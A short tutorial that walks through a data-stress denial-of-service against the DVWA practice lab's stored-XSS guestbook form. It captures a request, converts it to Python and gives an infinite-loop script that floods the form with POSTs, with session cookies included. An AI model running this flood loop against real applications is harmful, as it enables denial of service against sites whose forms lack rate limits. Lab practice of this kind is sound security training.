Applications’ DoS based on Data Stress using Python

The stress attack is similar to the database stress test in that both involve subjecting the application to large volumes of information and requiring a lot of processing and database connections. The goal is to identify the system breakpoint, at which point the system will fail.

To do this, one must search for a registration form that does not have a maximum number of interactions. With the help of an automated script, the application can be tested until the point of system failure is identified.

To practice this attack, access the DVWA system on the XSS Stored vulnerability page. This page can be accessed through the link http://<IP>/dvwa/vulnerabilities/xss_s/. Once there, fill out the form with random data to make it easier. Before submitting the page, open the element inspector with F12 and submit the data. Then, go to the networking tab, left-click on the request made and copy it as cURL.

To convert the command to cURL format for a python script, you can access the website https://curl.trillworks.com/ and paste the cURL command. This will give you a python script to perform the same request.

We have the Python script, which we need to modify so that it runs in an infinite loop, sending data periodically and displaying some kind of status on the screen. The intention is to cause an error. The code should look like this:

import requests

cookies = {
  'security': 'low',
  'security_level': '0',
  'tz_offset': '-18000',
  'BEEFHOOK': 'dsaifhioahfncnchruhnon',
  'dbx-postmeta': 'grabit=0-,1-,2-,3-,4-,5-,6-&advancedstuff=0-,1-,2-',
  'PHPSESSID': '0lcqep4s2v2jbnmksrsqltag66',
  'acopendivids': 'swingset,jotto,phpbb2,redmine',
  'acgroupswithpersist': 'nada',
}

headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20
100101 Firefox/68.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9
,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Referer': 'http://10.0.0.1/dvwa/vulnerabilities/xss_s/',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
}

data = {
'txtName': 'joseTeste',
'mtxMessage': 'text',
'btnSign': 'Sign Guestbook'
}

while(True):
  print(requests.post('http://<IP>/dvwa/vulnerabilities/xss
_s/', headers=headers, cookies=cookies, data=data))

Run the Python3 script with the command “python3 file.py” for a while, then head to http://<IP>/dvwa/vulnerabilities/xss_s/. You will be able to see the number of messages that have been stored in the database. When copying the code above to run, pay attention to the header data as each authentication will generate different data. For best results, it is recommended that you generate the code yourself and make necessary adaptations. Check out the results on the page afterwards.

It is clear that when an application has too much data, it can lead to a decrease in performance and potentially a denial of service attack. To prevent this from occurring, it is important to ensure that data is managed efficiently and that the system is regularly monitored to identify any potential issues. Additionally, appropriate security measures should be taken to mitigate the risk of a denial of service attack. By taking these steps, it will help to ensure that the application remains secure and operational.

In conclusion, the stress attack is a useful tool for testing the performance of an application and identifying potential system breakpoints. By using an automated script and monitoring the system, it is possible to identify any issues that may arise and take the necessary steps to prevent them. With the right security measures in place, it is possible to ensure that the application remains secure and operational.